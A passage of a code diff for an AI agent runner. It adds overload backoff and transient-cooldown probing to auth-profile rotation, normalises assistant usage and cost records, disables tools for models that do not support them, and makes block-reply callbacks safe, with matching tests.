expect(sleepWithAbortMock).toHaveBeenCalledWith(321, undefined); }); it("rotates on timeout without cooling down the timed-out profile", async () => { @@ -656,6 +750,8 @@ describe("runEmbeddedPiAgent auth profile rotation", () => { }); expect(typeof usageStats["openai:p2"]?.lastUsed).toBe("number"); expect(usageStats["openai:p1"]?.cooldownUntil).toBeUndefined(); + expect(computeBackoffMock).not.toHaveBeenCalled(); + expect(sleepWithAbortMock).not.toHaveBeenCalled(); }); it("rotates on bare service unavailable without cooling down the profile", async () => { @@ -829,7 +925,7 @@ describe("runEmbeddedPiAgent auth profile rotation", () => { }); }); - it("can probe one cooldowned profile when rate-limit cooldown probe is explicitly allowed", async () => { + it("can probe one cooldowned profile when transient cooldown probe is explicitly allowed", async () => { await withTimedAgentWorkspace(async ({ agentDir, workspaceDir, now }) => { await writeAuthStore(agentDir, { usageStats: { @@ -859,7 +955,7 @@ describe("runEmbeddedPiAgent auth profile rotation", () => { provider: "openai", model: "mock-1", authProfileIdSource: "auto", - allowRateLimitCooldownProbe: true, + allowTransientCooldownProbe: true, timeoutMs: 5_000, runId: "run:cooldown-probe", }); @@ -869,6 +965,54 @@ describe("runEmbeddedPiAgent auth profile rotation", () => { }); }); + it("can probe one cooldowned profile when overloaded cooldown is explicitly probeable", async () => { + await withTimedAgentWorkspace(async ({ agentDir, workspaceDir, now }) => { + await writeAuthStore(agentDir, { + usageStats: { + "openai:p1": { + lastUsed: 1, + cooldownUntil: now + 60 * 60 * 1000, + failureCounts: { overloaded: 4 }, + }, + "openai:p2": { + lastUsed: 2, + cooldownUntil: now + 60 * 60 * 1000, + failureCounts: { overloaded: 4 }, + }, + }, + }); + + runEmbeddedAttemptMock.mockResolvedValueOnce( + makeAttempt({ + assistantTexts: ["ok"], + lastAssistant: buildAssistant({ + stopReason: "stop", + content: [{ type: "text", text: "ok" }], + }), + }), + ); + + const result = await runEmbeddedPiAgent({ + sessionId: "session:test", + sessionKey: "agent:test:overloaded-cooldown-probe", + sessionFile: path.join(workspaceDir, "session.jsonl"), + workspaceDir, + agentDir, + config: makeConfig({ fallbacks: ["openai/mock-2"] }), + prompt: "hello", + provider: "openai", + model: "mock-1", + authProfileIdSource: "auto", + allowTransientCooldownProbe: true, + timeoutMs: 5_000, + runId: "run:overloaded-cooldown-probe", + }); + + expect(runEmbeddedAttemptMock).toHaveBeenCalledTimes(1); + expect(result.payloads?.[0]?.text ?? "").toContain("ok"); + }); + }); + it("treats agent-level fallbacks as configured when defaults have none", async () => { await withTimedAgentWorkspace(async ({ agentDir, workspaceDir, now }) => { await writeAuthStore(agentDir, { diff --git a/src/agents/pi-embedded-runner.sanitize-session-history.test.ts b/src/agents/pi-embedded-runner.sanitize-session-history.test.ts index 13884cd904f..e216a45f4f3 100644 --- a/src/agents/pi-embedded-runner.sanitize-session-history.test.ts +++ b/src/agents/pi-embedded-runner.sanitize-session-history.test.ts @@ -330,6 +330,131 @@ describe("sanitizeSessionHistory", () => { expect(assistants[1]?.usage).toBeDefined(); }); + it("adds a zeroed assistant usage snapshot when usage is missing", async () => { + vi.mocked(helpers.isGoogleModelApi).mockReturnValue(false); + + const messages = castAgentMessages([ + { role: "user", content: "question" }, + { + role: "assistant", + content: [{ type: "text", text: "answer without usage" }], + }, + ]); + + const result = await sanitizeOpenAIHistory(messages); + const assistant = result.find((message) => message.role === "assistant") as + | (AgentMessage & { usage?: unknown }) + | undefined; + + expect(assistant?.usage).toEqual(makeZeroUsageSnapshot()); + }); + + it("normalizes mixed partial assistant usage fields to numeric totals", async () => { + vi.mocked(helpers.isGoogleModelApi).mockReturnValue(false); + + const messages = castAgentMessages([ + { role: "user", content: "question" }, + { + role: "assistant", + content: [{ type: "text", text: "answer with partial usage" }], + usage: { + output: 3, + cache_read_input_tokens: 9, + }, + }, + ]); + + const result = await sanitizeOpenAIHistory(messages); + const assistant = result.find((message) => message.role === "assistant") as + | (AgentMessage & { usage?: unknown }) + | undefined; + + expect(assistant?.usage).toEqual({ + input: 0, + output: 3, + cacheRead: 9, + cacheWrite: 0, + totalTokens: 12, + }); + }); + + it("preserves existing usage cost while normalizing token fields", async () => { + vi.mocked(helpers.isGoogleModelApi).mockReturnValue(false); + + const messages = castAgentMessages([ + { role: "user", content: "question" }, + { + role: "assistant", + content: [{ type: "text", text: "answer with partial usage and cost" }], + usage: { + output: 3, + cache_read_input_tokens: 9, + cost: { + input: 1.25, + output: 2.5, + cacheRead: 0.25, + cacheWrite: 0, + total: 4, + }, + }, + }, + ]); + + const result = await sanitizeOpenAIHistory(messages); + const assistant = result.find((message) => message.role === "assistant") as + | (AgentMessage & { usage?: unknown }) + | undefined; + + expect(assistant?.usage).toEqual({ + ...makeZeroUsageSnapshot(), + input: 0, + output: 3, + cacheRead: 9, + cacheWrite: 0, + totalTokens: 12, + cost: { + input: 1.25, + output: 2.5, + cacheRead: 0.25, + cacheWrite: 0, + total: 4, + }, + }); + }); + + it("preserves unknown cost when token fields already match", async () => { + vi.mocked(helpers.isGoogleModelApi).mockReturnValue(false); + + const messages = castAgentMessages([ + { role: "user", content: "question" }, + { + role: "assistant", + content: [{ type: "text", text: "answer with complete numeric usage but no cost" }], + usage: { + input: 1, + output: 2, + cacheRead: 3, + cacheWrite: 4, + totalTokens: 10, + }, + }, + ]); + + const result = await sanitizeOpenAIHistory(messages); + const assistant = result.find((message) => message.role === "assistant") as + | (AgentMessage & { usage?: unknown }) + | undefined; + + expect(assistant?.usage).toEqual({ + input: 1, + output: 2, + cacheRead: 3, + cacheWrite: 4, + totalTokens: 10, + }); + expect((assistant?.usage as { cost?: unknown } | undefined)?.cost).toBeUndefined(); + }); + it("drops stale usage when compaction summary appears before kept assistant messages", async () => { vi.mocked(helpers.isGoogleModelApi).mockReturnValue(false); diff --git a/src/agents/pi-embedded-runner/compact.runtime.ts b/src/agents/pi-embedded-runner/compact.runtime.ts new file mode 100644 index 00000000000..33c4ed7066a --- /dev/null +++ b/src/agents/pi-embedded-runner/compact.runtime.ts @@ -0,0 +1 @@ +export { compactEmbeddedPiSessionDirect } from "./compact.js"; diff --git a/src/agents/pi-embedded-runner/compact.ts b/src/agents/pi-embedded-runner/compact.ts index 335c3a0e7d9..92bf4b97f23 100644 --- a/src/agents/pi-embedded-runner/compact.ts +++ b/src/agents/pi-embedded-runner/compact.ts @@ -38,6 +38,7 @@ import { formatUserTime, resolveUserTimeFormat, resolveUserTimezone } from "../d import { DEFAULT_CONTEXT_TOKENS, DEFAULT_MODEL, DEFAULT_PROVIDER } from "../defaults.js"; import { resolveOpenClawDocsPath } from "../docs-path.js"; import { getApiKeyForModel, resolveModelAuthMode } from "../model-auth.js"; +import { supportsModelTools } from "../model-tool-support.js"; import { ensureOpenClawModelsJson } from "../models-config.js"; import { resolveOwnerDisplaySetting } from "../owner-display.js"; import { @@ -400,7 +401,10 @@ export async function compactEmbeddedPiSessionDirect( modelContextWindowTokens: model.contextWindow, modelAuthMode: resolveModelAuthMode(model.provider, params.config), }); - const tools = sanitizeToolsForGoogle({ tools: toolsRaw, provider }); + const tools = sanitizeToolsForGoogle({ + tools: supportsModelTools(model) ? toolsRaw : [], + provider, + }); const allowedToolNames = collectAllowedToolNames({ tools }); logToolSchemasForGoogle({ tools, provider }); const machineName = await getMachineDisplayName(); diff --git a/src/agents/pi-embedded-runner/google.ts b/src/agents/pi-embedded-runner/google.ts index 094aa9142c3..4daf30552b3 100644 --- a/src/agents/pi-embedded-runner/google.ts +++ b/src/agents/pi-embedded-runner/google.ts @@ -25,7 +25,12 @@ import { } from "../session-transcript-repair.js"; import type { TranscriptPolicy } from "../transcript-policy.js"; import { resolveTranscriptPolicy } from "../transcript-policy.js"; -import { makeZeroUsageSnapshot } from "../usage.js"; +import { + makeZeroUsageSnapshot, + normalizeUsage, + type AssistantUsageSnapshot, + type UsageLike, +} from "../usage.js"; import { log } from "./logger.js"; import { dropThinkingBlocks } from "./thinking.js"; import { describeUnknownError } from "./utils.js"; @@ -200,6 +205,111 @@ function stripStaleAssistantUsageBeforeLatestCompaction(messages: AgentMessage[] return touched ? out : messages; } +function normalizeAssistantUsageSnapshot(usage: unknown) { + const normalized = normalizeUsage((usage ?? undefined) as UsageLike | undefined); + if (!normalized) { + return makeZeroUsageSnapshot(); + } + const input = normalized.input ?? 0; + const output = normalized.output ?? 0; + const cacheRead = normalized.cacheRead ?? 0; + const cacheWrite = normalized.cacheWrite ?? 0; + const totalTokens = normalized.total ?? input + output + cacheRead + cacheWrite; + const cost = normalizeAssistantUsageCost(usage); + return { + input, + output, + cacheRead, + cacheWrite, + totalTokens, + ...(cost ? { cost } : {}), + }; +} + +function normalizeAssistantUsageCost(usage: unknown): AssistantUsageSnapshot["cost"] | undefined { + const base = makeZeroUsageSnapshot().cost; + if (!usage || typeof usage !== "object") { + return undefined; + } + const rawCost = (usage as { cost?: unknown }).cost; + if (!rawCost || typeof rawCost !== "object") { + return undefined; + } + const cost = rawCost as Record; + const inputRaw = toFiniteCostNumber(cost.input); + const outputRaw = toFiniteCostNumber(cost.output); + const cacheReadRaw = toFiniteCostNumber(cost.cacheRead); + const cacheWriteRaw = toFiniteCostNumber(cost.cacheWrite); + const totalRaw = toFiniteCostNumber(cost.total); + if ( + inputRaw === undefined && + outputRaw === undefined && + cacheReadRaw === undefined && + cacheWriteRaw === undefined && + totalRaw === undefined + ) { + return undefined; + } + const input = inputRaw ?? base.input; + const output = outputRaw ?? base.output; + const cacheRead = cacheReadRaw ?? base.cacheRead; + const cacheWrite = cacheWriteRaw ?? base.cacheWrite; + const total = totalRaw ?? input + output + cacheRead + cacheWrite; + return { input, output, cacheRead, cacheWrite, total }; +} + +function toFiniteCostNumber(value: unknown): number | undefined { + return typeof value === "number" && Number.isFinite(value) ? value : undefined; +} + +function ensureAssistantUsageSnapshots(messages: AgentMessage[]): AgentMessage[] { + if (messages.length === 0) { + return messages; + } + + let touched = false; + const out = [...messages]; + for (let i = 0; i < out.length; i += 1) { + const message = out[i] as (AgentMessage & { role?: unknown; usage?: unknown }) | undefined; + if (!message || message.role !== "assistant") { + continue; + } + const normalizedUsage = normalizeAssistantUsageSnapshot(message.usage); + const usageCost = + message.usage && typeof message.usage === "object" + ? (message.usage as { cost?: unknown }).cost + : undefined; + const normalizedCost = normalizedUsage.cost; + if ( + message.usage && + typeof message.usage === "object" && + (message.usage as { input?: unknown }).input === normalizedUsage.input && + (message.usage as { output?: unknown }).output === normalizedUsage.output && + (message.usage as { cacheRead?: unknown }).cacheRead === normalizedUsage.cacheRead && + (message.usage as { cacheWrite?: unknown }).cacheWrite === normalizedUsage.cacheWrite && + (message.usage as { totalTokens?: unknown }).totalTokens === normalizedUsage.totalTokens && + ((normalizedCost && + usageCost && + typeof usageCost === "object" && + (usageCost as { input?: unknown }).input === normalizedCost.input && + (usageCost as { output?: unknown }).output === normalizedCost.output && + (usageCost as { cacheRead?: unknown }).cacheRead === normalizedCost.cacheRead && + (usageCost as { cacheWrite?: unknown }).cacheWrite === normalizedCost.cacheWrite && + (usageCost as { total?: unknown }).total === normalizedCost.total) || + (!normalizedCost && usageCost === undefined)) + ) { + continue; + } + out[i] = { + ...(message as unknown as Record), + usage: normalizedUsage, + } as AgentMessage; + touched = true; + } + + return touched ? out : messages; +} + export function findUnsupportedSchemaKeywords(schema: unknown, path: string): string[] { if (!schema || typeof schema !== "object") { return []; @@ -449,8 +559,9 @@ export async function sanitizeSessionHistory(params: { ? sanitizeToolUseResultPairing(sanitizedToolCalls) : sanitizedToolCalls; const sanitizedToolResults = stripToolResultDetails(repairedTools); - const sanitizedCompactionUsage = - stripStaleAssistantUsageBeforeLatestCompaction(sanitizedToolResults); + const sanitizedCompactionUsage = ensureAssistantUsageSnapshots( + stripStaleAssistantUsageBeforeLatestCompaction(sanitizedToolResults), + ); const isOpenAIResponsesApi = params.modelApi === "openai-responses" || params.modelApi === "openai-codex-responses"; diff --git a/src/agents/pi-embedded-runner/run.ts b/src/agents/pi-embedded-runner/run.ts index 52faf8514b7..c1d1d414c49 100644 --- a/src/agents/pi-embedded-runner/run.ts +++ b/src/agents/pi-embedded-runner/run.ts @@ -5,6 +5,7 @@ import { ensureContextEnginesInitialized, resolveContextEngine, } from "../../context-engine/index.js"; +import { computeBackoff, sleepWithAbort, type BackoffPolicy } from "../../infra/backoff.js"; import { generateSecureToken } from "../../infra/secure-random.js"; import { getGlobalHookRunner } from "../../plugins/hook-runner-global.js"; import type { PluginHookBeforeAgentStartResult } from "../../plugins/types.js"; @@ -14,6 +15,7 @@ import { resolveOpenClawAgentDir } from "../agent-paths.js"; import { hasConfiguredModelFallbacks } from "../agent-scope.js"; import { isProfileInCooldown, + type AuthProfileFailureReason, markAuthProfileFailure, markAuthProfileGood, markAuthProfileUsed, @@ -79,6 +81,14 @@ type CopilotTokenState = { const COPILOT_REFRESH_MARGIN_MS = 5 * 60 * 1000; const COPILOT_REFRESH_RETRY_MS = 60 * 1000; const COPILOT_REFRESH_MIN_DELAY_MS = 5 * 1000; +// Keep overload pacing noticeable enough to avoid tight retry bursts, but short +// enough that fallback still feels responsive within a single turn. +const OVERLOAD_FAILOVER_BACKOFF_POLICY: BackoffPolicy = { + initialMs: 250, + maxMs: 1_500, + factor: 2, + jitter: 0.2, +}; // Avoid Anthropic's refusal test token poisoning session transcripts. const ANTHROPIC_MAGIC_STRING_TRIGGER_REFUSAL = "ANTHROPIC_MAGIC_STRING_TRIGGER_REFUSAL"; @@ -649,21 +659,21 @@ export async function runEmbeddedPiAgent( profileIds: autoProfileCandidates, }) ?? "rate_limit") : null; - const allowRateLimitCooldownProbe = - params.allowRateLimitCooldownProbe === true && + const allowTransientCooldownProbe = + params.allowTransientCooldownProbe === true && allAutoProfilesInCooldown && - unavailableReason === "rate_limit"; - let didRateLimitCooldownProbe = false; + (unavailableReason === "rate_limit" || unavailableReason === "overloaded"); + let didTransientCooldownProbe = false; while (profileIndex < profileCandidates.length) { const candidate = profileCandidates[profileIndex]; const inCooldown = candidate && candidate !== lockedProfileId && isProfileInCooldown(authStore, candidate); if (inCooldown) { - if (allowRateLimitCooldownProbe && !didRateLimitCooldownProbe) { - didRateLimitCooldownProbe = true; + if (allowTransientCooldownProbe && !didTransientCooldownProbe) { + didTransientCooldownProbe = true; log.warn( - `probing cooldowned auth profile for ${provider}/${modelId} due to rate_limit unavailability`, + `probing cooldowned auth profile for ${provider}/${modelId} due to ${unavailableReason ?? "transient"} unavailability`, ); } else { profileIndex += 1; @@ -722,9 +732,10 @@ export async function runEmbeddedPiAgent( let lastRunPromptUsage: ReturnType | undefined; let autoCompactionCount = 0; let runLoopIterations = 0; + let overloadFailoverAttempts = 0; const maybeMarkAuthProfileFailure = async (failure: { profileId?: string; - reason?: Parameters[0]["reason"] | null; + reason?: AuthProfileFailureReason | null; config?: RunEmbeddedPiAgentParams["config"]; agentDir?: RunEmbeddedPiAgentParams["agentDir"]; }) => { @@ -740,6 +751,36 @@ export async function runEmbeddedPiAgent( agentDir, }); }; + const resolveAuthProfileFailureReason = ( + failoverReason: FailoverReason | null, + ): AuthProfileFailureReason | null => { + // Timeouts are transport/model-path failures, not auth health signals, + // so they should not persist auth-profile failure state. + if (!failoverReason || failoverReason === "timeout") { + return null; + } + return failoverReason; + }; + const maybeBackoffBeforeOverloadFailover = async (reason: FailoverReason | null) => { + if (reason !== "overloaded") { + return; + } + overloadFailoverAttempts += 1; + const delayMs = computeBackoff(OVERLOAD_FAILOVER_BACKOFF_POLICY, overloadFailoverAttempts); + log.warn( + `overload backoff before failover for ${provider}/${modelId}: attempt=${overloadFailoverAttempts} delayMs=${delayMs}`, + ); + try { + await sleepWithAbort(delayMs, params.abortSignal); + } catch (err) { + if (params.abortSignal?.aborted) { + const abortErr = new Error("Operation aborted", { cause: err }); + abortErr.name = "AbortError"; + throw abortErr; + } + throw err; + } + }; // Resolve the context engine once and reuse across retries to avoid // repeated initialization/connection overhead per attempt. ensureContextEnginesInitialized(); @@ -803,6 +844,10 @@ export async function runEmbeddedPiAgent( groupChannel: params.groupChannel, groupSpace: params.groupSpace, spawnedBy: params.spawnedBy, + senderId: params.senderId, + senderName: params.senderName, + senderUsername: params.senderUsername, + senderE164: params.senderE164, senderIsOwner: params.senderIsOwner, currentChannelId: params.currentChannelId, currentThreadTs: params.currentThreadTs, @@ -1161,15 +1206,19 @@ export async function runEmbeddedPiAgent( }; } const promptFailoverReason = classifyFailoverReason(errorText); + const promptProfileFailureReason = + resolveAuthProfileFailureReason(promptFailoverReason); await maybeMarkAuthProfileFailure({ profileId: lastProfileId, - reason: promptFailoverReason, + reason: promptProfileFailureReason, }); + const promptFailoverFailure = isFailoverErrorMessage(errorText); if ( - isFailoverErrorMessage(errorText) && + promptFailoverFailure && promptFailoverReason !== "timeout" && (await advanceAuthProfile()) ) { + await maybeBackoffBeforeOverloadFailover(promptFailoverReason); continue; } const fallbackThinking = pickFallbackThinkingLevel({ @@ -1183,9 +1232,11 @@ export async function runEmbeddedPiAgent( thinkLevel = fallbackThinking; continue; } - // FIX: Throw FailoverError for prompt errors when fallbacks configured - // This enables model fallback for quota/rate limit errors during prompt submission - if (fallbackConfigured && isFailoverErrorMessage(errorText)) { + // Throw FailoverError for prompt-side failover reasons when fallbacks + // are configured so outer model fallback can continue on overload, + // rate-limit, auth, or billing failures. + if (fallbackConfigured && promptFailoverFailure) { + await maybeBackoffBeforeOverloadFailover(promptFailoverReason); throw new FailoverError(errorText, { reason: promptFailoverReason ?? "unknown", provider, @@ -1214,6 +1265,8 @@ export async function runEmbeddedPiAgent( const billingFailure = isBillingAssistantError(lastAssistant); const failoverFailure = isFailoverAssistantError(lastAssistant); const assistantFailoverReason = classifyFailoverReason(lastAssistant?.errorMessage ?? ""); + const assistantProfileFailureReason = + resolveAuthProfileFailureReason(assistantFailoverReason); const cloudCodeAssistFormatError = attempt.cloudCodeAssistFormatError; const imageDimensionError = parseImageDimensionError(lastAssistant?.errorMessage ?? ""); @@ -1253,10 +1306,7 @@ export async function runEmbeddedPiAgent( if (shouldRotate) { if (lastProfileId) { - const reason = - timedOut || assistantFailoverReason === "timeout" - ? "timeout" - : (assistantFailoverReason ?? "unknown"); + const reason = timedOut ? "timeout" : assistantProfileFailureReason; // Skip cooldown for timeouts: a timeout is model/network-specific, // not an auth issue. Marking the profile would poison fallback models // on the same provider (e.g. gpt-5.3 timeout blocks gpt-5.2). @@ -1276,10 +1326,12 @@ export async function runEmbeddedPiAgent( const rotated = await advanceAuthProfile(); if (rotated) { + await maybeBackoffBeforeOverloadFailover(assistantFailoverReason); continue; } if (fallbackConfigured) { + await maybeBackoffBeforeOverloadFailover(assistantFailoverReason); // Prefer formatted error message (user-friendly) over raw errorMessage const message = (lastAssistant diff --git a/src/agents/pi-embedded-runner/run/attempt.ts b/src/agents/pi-embedded-runner/run/attempt.ts index 61159c13357..e8bac7d6fba 100644 --- a/src/agents/pi-embedded-runner/run/attempt.ts +++ b/src/agents/pi-embedded-runner/run/attempt.ts @@ -49,6 +49,7 @@ import { isTimeoutError } from "../../failover-error.js"; import { resolveImageSanitizationLimits } from "../../image-sanitization.js"; import { resolveModelAuthMode } from "../../model-auth.js"; import { normalizeProviderId, resolveDefaultModelForAgent } from "../../model-selection.js"; +import { supportsModelTools } from "../../model-tool-support.js"; import { createOllamaStreamFn, OLLAMA_NATIVE_BASE_URL } from "../../ollama-stream.js"; import { createOpenAIWebSocketStreamFn, releaseWsSession } from "../../openai-ws-stream.js"; import { resolveOwnerDisplaySetting } from "../../owner-display.js"; @@ -878,10 +879,15 @@ export async function runEmbeddedAttempt( params.requireExplicitMessageTarget ?? isSubagentSessionKey(params.sessionKey), disableMessageTool: params.disableMessageTool, }); - const tools = sanitizeToolsForGoogle({ tools: toolsRaw, provider: params.provider }); + const toolsEnabled = supportsModelTools(params.model); + const tools = sanitizeToolsForGoogle({ + tools: toolsEnabled ? toolsRaw : [], + provider: params.provider, + }); + const clientTools = toolsEnabled ? params.clientTools : undefined; const allowedToolNames = collectAllowedToolNames({ tools, - clientTools: params.clientTools, + clientTools, }); logToolSchemasForGoogle({ tools, provider: params.provider }); @@ -1146,9 +1152,9 @@ export async function runEmbeddedAttempt( cfg: params.config, agentId: sessionAgentId, }); - const clientToolDefs = params.clientTools + const clientToolDefs = clientTools ? toClientToolDefinitions( - params.clientTools, + clientTools, (toolName, toolParams) => { clientToolCallDetected = { name: toolName, params: toolParams }; }, diff --git a/src/agents/pi-embedded-runner/run/params.ts b/src/agents/pi-embedded-runner/run/params.ts index fd0f2112361..6d067c910bf 100644 --- a/src/agents/pi-embedded-runner/run/params.ts +++ b/src/agents/pi-embedded-runner/run/params.ts @@ -115,10 +115,10 @@ export type RunEmbeddedPiAgentParams = { enforceFinalTag?: boolean; /** * Allow a single run attempt even when all auth profiles are in cooldown, - * but only for inferred `rate_limit` cooldowns. + * but only for inferred transient cooldowns like `rate_limit` or `overloaded`. * * This is used by model fallback when trying sibling models on providers - * where rate limits are often model-scoped. + * where transient service pressure is often model-scoped. */ - allowRateLimitCooldownProbe?: boolean; + allowTransientCooldownProbe?: boolean; }; diff --git a/src/agents/pi-embedded-runner/sanitize-session-history.tool-result-details.test.ts b/src/agents/pi-embedded-runner/sanitize-session-history.tool-result-details.test.ts index ca1a60fc10c..c888ae2f4ab 100644 --- a/src/agents/pi-embedded-runner/sanitize-session-history.tool-result-details.test.ts +++ b/src/agents/pi-embedded-runner/sanitize-session-history.tool-result-details.test.ts @@ -1,35 +1,21 @@ import type { AgentMessage } from "@mariozechner/pi-agent-core"; -import type { AssistantMessage, ToolResultMessage, UserMessage } from "@mariozechner/pi-ai"; +import type { ToolResultMessage, UserMessage } from "@mariozechner/pi-ai"; import { SessionManager } from "@mariozechner/pi-coding-agent"; import { describe, expect, it } from "vitest"; +import { makeAgentAssistantMessage } from "../test-helpers/agent-message-fixtures.js"; import { sanitizeSessionHistory } from "./google.js"; -function makeAssistantToolCall(timestamp: number): AssistantMessage { - return { - role: "assistant", - content: [{ type: "toolCall", id: "call_1", name: "web_fetch", arguments: { url: "x" } }], - api: "openai-responses", - provider: "openai", - model: "gpt-5.2", - usage: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - totalTokens: 0, - cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, total: 0 }, - }, - stopReason: "toolUse", - timestamp, - }; -} - describe("sanitizeSessionHistory toolResult details stripping", () => { it("strips toolResult.details so untrusted payloads are not fed back to the model", async () => { const sm = SessionManager.inMemory(); const messages: AgentMessage[] = [ - makeAssistantToolCall(1), + makeAgentAssistantMessage({ + content: [{ type: "toolCall", id: "call_1", name: "web_fetch", arguments: { url: "x" } }], + model: "gpt-5.2", + stopReason: "toolUse", + timestamp: 1, + }), { role: "toolResult", toolCallId: "call_1", diff --git a/src/agents/pi-embedded-runner/tool-result-truncation.test.ts b/src/agents/pi-embedded-runner/tool-result-truncation.test.ts index 8b4fbb628c6..2dce36ed076 100644 --- a/src/agents/pi-embedded-runner/tool-result-truncation.test.ts +++ b/src/agents/pi-embedded-runner/tool-result-truncation.test.ts @@ -1,6 +1,7 @@ import type { AgentMessage } from "@mariozechner/pi-agent-core"; import type { AssistantMessage, ToolResultMessage, UserMessage } from "@mariozechner/pi-ai"; import { describe, expect, it } from "vitest"; +import { makeAgentAssistantMessage } from "../test-helpers/agent-message-fixtures.js"; import { truncateToolResultText, truncateToolResultMessage, @@ -35,23 +36,12 @@ function makeUserMessage(text: string): UserMessage { } function makeAssistantMessage(text: string): AssistantMessage { - return { - role: "assistant", + return makeAgentAssistantMessage({ content: [{ type: "text", text }], - api: "openai-responses", - provider: "openai", model: "gpt-5.2", - usage: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - totalTokens: 0, - cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, total: 0 }, - }, stopReason: "stop", timestamp: nextTimestamp(), - }; + }); } describe("truncateToolResultText", () => { diff --git a/src/agents/pi-embedded-runner/usage-reporting.test.ts b/src/agents/pi-embedded-runner/usage-reporting.test.ts index ed8d1227225..f4d6f5cbe44 100644 --- a/src/agents/pi-embedded-runner/usage-reporting.test.ts +++ b/src/agents/pi-embedded-runner/usage-reporting.test.ts @@ -10,6 +10,40 @@ describe("runEmbeddedPiAgent usage reporting", () => { vi.clearAllMocks(); }); + it("forwards sender identity fields into embedded attempts", async () => { + mockedRunEmbeddedAttempt.mockResolvedValueOnce({ + aborted: false, + promptError: null, + timedOut: false, + sessionIdUsed: "test-session", + assistantTexts: ["Response 1"], + // eslint-disable-next-line @typescript-eslint/no-explicit-any + } as any); + + await runEmbeddedPiAgent({ + sessionId: "test-session", + sessionKey: "test-key", + sessionFile: "/tmp/session.json", + workspaceDir: "/tmp/workspace", + prompt: "hello", + timeoutMs: 30000, + runId: "run-sender-forwarding", + senderId: "user-123", + senderName: "Josh Lehman", + senderUsername: "josh", + senderE164: "+15551234567", + }); + + expect(mockedRunEmbeddedAttempt).toHaveBeenCalledWith( + expect.objectContaining({ + senderId: "user-123", + senderName: "Josh Lehman", + senderUsername: "josh", + senderE164: "+15551234567", + }), + ); + }); + it("reports total usage from the last turn instead of accumulated total", async () => { // Simulate a multi-turn run result. // Turn 1: Input 100, Output 50. Total 150. diff --git a/src/agents/pi-embedded-subscribe.block-reply-rejections.test.ts b/src/agents/pi-embedded-subscribe.block-reply-rejections.test.ts new file mode 100644 index 00000000000..704d5d98a76 --- /dev/null +++ b/src/agents/pi-embedded-subscribe.block-reply-rejections.test.ts @@ -0,0 +1,57 @@ +import { afterEach, describe, expect, it, vi } from "vitest"; +import { + createSubscribedSessionHarness, + emitAssistantTextDelta, + emitAssistantTextEnd, + emitMessageStartAndEndForAssistantText, +} from "./pi-embedded-subscribe.e2e-harness.js"; + +const waitForAsyncCallbacks = async () => { + await Promise.resolve(); + await new Promise((resolve) => setTimeout(resolve, 0)); +}; + +describe("subscribeEmbeddedPiSession block reply rejections", () => { + const unhandledRejections: unknown[] = []; + const onUnhandledRejection = (reason: unknown) => { + unhandledRejections.push(reason); + }; + + afterEach(() => { + process.off("unhandledRejection", onUnhandledRejection); + unhandledRejections.length = 0; + }); + + it("contains rejected async text_end block replies", async () => { + process.on("unhandledRejection", onUnhandledRejection); + const onBlockReply = vi.fn().mockRejectedValue(new Error("boom")); + const { emit } = createSubscribedSessionHarness({ + runId: "run", + onBlockReply, + blockReplyBreak: "text_end", + }); + + emitAssistantTextDelta({ emit, delta: "Hello block" }); + emitAssistantTextEnd({ emit }); + await waitForAsyncCallbacks(); + + expect(onBlockReply).toHaveBeenCalledTimes(1); + expect(unhandledRejections).toHaveLength(0); + }); + + it("contains rejected async message_end block replies", async () => { + process.on("unhandledRejection", onUnhandledRejection); + const onBlockReply = vi.fn().mockRejectedValue(new Error("boom")); + const { emit } = createSubscribedSessionHarness({ + runId: "run", + onBlockReply, + blockReplyBreak: "message_end", + }); + + emitMessageStartAndEndForAssistantText({ emit, text: "Hello block" }); + await waitForAsyncCallbacks(); + + expect(onBlockReply).toHaveBeenCalledTimes(1); + expect(unhandledRejections).toHaveLength(0); + }); +}); diff --git a/src/agents/pi-embedded-subscribe.handlers.messages.ts b/src/agents/pi-embedded-subscribe.handlers.messages.ts index d58690814a3..c89a4b71496 100644 --- a/src/agents/pi-embedded-subscribe.handlers.messages.ts +++ b/src/agents/pi-embedded-subscribe.handlers.messages.ts @@ -326,6 +326,16 @@ export function handleMessageEnd( ctx.finalizeAssistantTexts({ text, addedDuringMessage, chunkerHasBuffered }); const onBlockReply = ctx.params.onBlockReply; + const emitBlockReplySafely = (payload: Parameters>[0]) => { + if (!onBlockReply) { + return; + } + void Promise.resolve() + .then(() => onBlockReply(payload)) + .catch((err) => { + ctx.log.warn(`block reply callback failed: ${String(err)}`); + }); + }; const shouldEmitReasoning = Boolean( ctx.state.includeReasoning && formattedReasoning && @@ -339,7 +349,7 @@ export function handleMessageEnd( return; } ctx.state.lastReasoningSent = formattedReasoning; - void onBlockReply?.({ text: formattedReasoning, isReasoning: true }); + emitBlockReplySafely({ text: formattedReasoning, isReasoning: true }); }; if (shouldEmitReasoningBeforeAnswer) { @@ -362,7 +372,7 @@ export function handleMessageEnd( } = splitResult; // Emit if there's content OR audioAsVoice flag (to propagate the flag). if (cleanedText || (mediaUrls && mediaUrls.length > 0) || audioAsVoice) { - void onBlockReply({ + emitBlockReplySafely({ text: cleanedText, mediaUrls: mediaUrls?.length ? mediaUrls : undefined, audioAsVoice, diff --git a/src/agents/pi-embedded-subscribe.ts b/src/agents/pi-embedded-subscribe.ts index 7d2195b98ce..c5ffedbf14f 100644 --- a/src/agents/pi-embedded-subscribe.ts +++ b/src/agents/pi-embedded-subscribe.ts @@ -100,6 +100,18 @@ export function subscribeEmbeddedPiSession(params: SubscribeEmbeddedPiSessionPar const pendingMessagingTargets = state.pendingMessagingTargets; const replyDirectiveAccumulator = createStreamingDirectiveAccumulator(); const partialReplyDirectiveAccumulator = createStreamingDirectiveAccumulator(); + const emitBlockReplySafely = ( + payload: Parameters>[0], + ) => { + if (!params.onBlockReply) { + return; + } + void Promise.resolve() + .then(() => params.onBlockReply?.(payload)) + .catch((err) => { + log.warn(`block reply callback failed: ${String(err)}`); + }); + }; const resetAssistantMessageState = (nextAssistantTextBaseline: number) => { state.deltaBuffer = ""; @@ -510,7 +522,7 @@ export function subscribeEmbeddedPiSession(params: SubscribeEmbeddedPiSessionPar if (!cleanedText && (!mediaUrls || mediaUrls.length === 0) && !audioAsVoice) { return; } - void params.onBlockReply({ + emitBlockReplySafely({ text: cleanedText, mediaUrls: mediaUrls?.length ? mediaUrls : undefined, audioAsVoice, diff --git a/src/agents/pi-model-discovery.ts b/src/agents/pi-model-discovery.ts index 